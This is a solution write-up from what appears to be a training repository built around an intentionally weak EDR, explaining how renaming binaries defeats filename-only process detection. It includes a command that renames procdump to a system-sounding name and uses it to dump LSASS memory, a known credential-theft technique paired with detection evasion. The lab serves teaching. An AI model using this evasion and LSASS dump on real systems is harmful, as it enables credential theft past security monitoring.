Files
BenjiTrapp-MostShittyEDR/_solutions/03-copy-and-rename.md
T
Der BenjiandClaude Opus 4.6 c37272daa6 Fix 404s: move challenges/solutions to Jekyll collections (_prefix)
Jekyll collections require the underscore-prefixed directory naming
convention (_challenges, _solutions). Move files accordingly, extract
index pages to root with proper permalinks, and fix defaults scope
in _config.yml to use type-based matching.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-07-15 10:14:35 +02:00

864 B

title, difficulty, category
title difficulty category
Solution 03: Copy and Rename easy Process Name Evasion

[Back to Challenge]({{ '/challenges/03-copy-and-rename/' | relative_url }})

Overview

Since the EDR has no hash-based detection, copying a binary to any non-blacklisted name works.

Solution

# Copy to an innocent-looking name
copy C:\Windows\notepad.exe C:\Temp\TextEditor.exe
.\TextEditor.exe

# Copy procdump with a system-sounding name
copy procdump.exe svcdiag.exe
.\svcdiag.exe -ma lsass.exe

Why It Works

The EDR identifies processes solely by their executable filename. It has:

  • No file hash checking (Rule 6 database is empty)
  • No digital signature verification
  • No file metadata analysis
  • No YARA rule scanning

A binary's behavior is identical regardless of its filename. The copy is functionally the same as the original.